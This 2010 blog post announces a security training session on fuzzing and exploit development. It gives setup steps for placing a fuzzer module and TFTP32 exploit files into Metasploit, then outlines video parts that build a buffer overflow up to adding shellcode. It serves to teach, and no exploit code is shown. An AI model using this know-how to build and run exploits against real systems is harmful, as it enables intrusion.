Originally posted on: TUESDAY, MAY 4, 2010 AT 5:17PM
On May 8th the Kentucky ISSA held a training in Louisville, KY. I was asked to teach the section on Fuzzing and Exploit Development. Having only an hour to cover this VERY complex topic I demonstrated a basic buffer overflow. We start with fuzzing and go through the basic steps of development. This is an old, well known exploit but it demonstrates the important principles. Feel free to follow along with the videos and post any questions in the comments section.
Download Immunity DBG - Go To Immunity
Download Files - Here
Copy the simple_fuzzer.rb file to %MSFROOT%/modules/auxiliary/fuzzers/tftp/
Copy the tftp32-* files to %MSFROOT%/modules/exploit/windows/priv/
Note: In backtrack %MSFROOT% is /pentest/exploit/framework3
Note: You will need to create the tftp and priv folders.
Part One - Fuzzing with Metasploit
Part Two - Finding EIP
Part Three - Build the Exploit
Part Four - Find EIP Offset
Part Five - Add and Test EIP Overwrite
Part Six - Add Shellcode